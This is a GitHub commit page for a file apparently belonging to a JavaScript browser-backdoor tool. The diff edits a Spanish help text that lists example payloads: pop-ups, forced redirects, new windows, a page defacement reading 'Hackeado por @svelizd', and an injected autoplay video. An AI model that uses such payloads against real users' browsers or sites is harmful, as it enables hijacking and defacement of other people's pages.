Skip to content

Commit

Permalink
Update jsbackdoor.py
Browse files Browse the repository at this point in the history
  • Loading branch information
SVelizDonoso authored Apr 7, 2018
1 parent 6f2908d commit 1b335f3
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions jsbackdoor.py
Original file line number Diff line number Diff line change
Expand Up @@ -62,9 +62,9 @@ def optionsbackdoor():
options ="""
Ejemplos de Payload:
Mensaje: alert('Hola Mundo!')
Mensaje: alert('Hola Mundo!');
Pregunta: confirm("Te gustaria Aprender Haching?");
Redireccion: window.location = 'https://www.google.com';"
Redireccion: window.location = 'https://www.google.com';
Nueva Ventana: window.open('https://www.github.com');
Defacement: document.body.innerHTML = '<br><br><br><h1>Hackeado por @svelizd </h1>';
Video: document.body.innerHTML = '<iframe width="420" height="345" src="https://www.youtube.com/embed/tgbNymZ7vqY?autoplay=1"></iframe>';
Expand Down

0 comments on commit 1b335f3

Please sign in to comment.